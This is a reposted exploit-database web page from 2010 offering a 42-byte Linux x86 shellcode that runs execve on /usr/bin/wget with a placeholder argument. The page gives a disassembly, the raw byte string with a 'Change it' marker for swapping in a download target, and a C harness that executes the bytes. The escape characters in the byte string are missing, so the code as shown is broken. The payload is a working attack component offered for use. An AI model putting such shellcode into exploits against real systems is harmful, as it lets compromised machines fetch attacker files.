Home / os / win7

linux/x86 execve("/usr/bin/wget", "aaaa"

Posted on 19 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>linux/x86 execve(&quot;/usr/bin/wget&quot;, &quot;aaaa&quot;); - 42 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=====================================================
linux/x86 execve(&quot;/usr/bin/wget&quot;, &quot;aaaa&quot;); - 42 bytes
=====================================================


/*
Title:   Linux x86 execve(&quot;/usr/bin/wget&quot;, &quot;aaaa&quot;); - 42 bytes
Author:  Jonathan Salwan &lt;submit AT shell-storm.org&gt;
Web:     http://www.shell-storm.org
Twitter: http://twitter.com/shell_storm
 
 
!Database of Shellcodes http://www.shell-storm.org/shellcode/
 
 
08048054 &lt;.text&gt;:
 8048054:   6a 0b                   push   $0xb
 8048056:   58                      pop    %eax
 8048057:   99                      cltd  
 8048058:   52                      push   %edx
 8048059:   68 61 61 61 61          push   $0x61616161
 804805e:   89 e1                   mov    %esp,%ecx
 8048060:   52                      push   %edx
 8048061:   6a 74                   push   $0x74
 8048063:   68 2f 77 67 65          push   $0x6567772f
 8048068:   68 2f 62 69 6e          push   $0x6e69622f
 804806d:   68 2f 75 73 72          push   $0x7273752f
 8048072:   89 e3                   mov    %esp,%ebx
 8048074:   52                      push   %edx
 8048075:   51                      push   %ecx
 8048076:   53                      push   %ebx
 8048077:   89 e1                   mov    %esp,%ecx
 8048079:   cd 80                   int    $0x80
 804807b:   40                      inc    %eax
 804807c:   cd 80                   int    $0x80
*/
 
#include &lt;stdio.h&gt;
 
char sc[] =     &quot;x6ax0bx58x99x52&quot;
        &quot;x68x61x61x61x61&quot; // Change it
        &quot;x89xe1x52x6ax74&quot;
        &quot;x68x2fx77x67x65&quot;
        &quot;x68x2fx62x69x6e&quot;
        &quot;x68x2fx75x73x72&quot;
        &quot;x89xe3x52x51x53&quot;
        &quot;x89xe1xcdx80x40&quot;
        &quot;xcdx80&quot;;
 
int main(void)
{
        fprintf(stdout,&quot;Length: %d
&quot;,strlen(sc));
    (*(void(*)()) sc)();
      
return 0;
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-19]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :